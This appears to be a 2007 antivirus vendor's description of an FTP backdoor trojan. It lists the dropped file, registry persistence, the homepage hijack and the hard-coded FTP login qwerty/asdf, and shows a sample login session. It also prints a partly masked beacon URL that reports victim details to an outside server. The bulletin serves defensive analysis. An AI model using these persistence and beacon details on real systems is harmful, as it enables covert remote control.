病毒别名： 处理时间：2007-03-23 威胁级别：★

中文名称： 病毒类型：黑客程序 影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

该病毒是一个后门程序。运行该病毒会使系统成为ftp服务器。黑客通过病毒上报的系统信息可以完成控制受感染机器。

1、生成的文件

%SystemRoot%\\csrss.exe

2、添加启动项

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run

"system" = "%SystemRoot%\\csrss.exe"

3、修改ie主页

HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\

"Start Page" = "http://debormammana.***/cgi-bin/tsp/tsout.cgi"

4、将感染机器信息上报到指定服务器，以便黑客通过用户ip地址控制感染机器

http://softwarediscount.***/images/add.php?name=%s&ip1=%s&ftpport=21&ftpuser=qwerty&ftppass=asdf&socks5port=%s&cid=damrai

5、结束指定进程。

6、添加注册表连接端口信息，是机器同时监听5637和21TCP端口

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SOCKSPort

"(Default)" = "0x1605"（5637）

7、病毒在系统中添加用户名为qwerty密码为asdf的ftp用户，感染机器可以被完成控制。

--------------------------------------------------------

ftp> open 127.0.0.1

Connected to 127.0.0.1.

220 vict. FTP

User (127.0.0.1:(none)): qwerty

331 Password required for qwerty.

Password:

230 User logged in, proceed.

ftp> ls

200 Port command successful.

150 Opening data connection.

A:

C:

D:

E:

Z:

226 Transfer ok

ftp: 20 bytes received in 0.02Seconds 1.25Kbytes/sec.

ftp>

-------------------------------------------------------------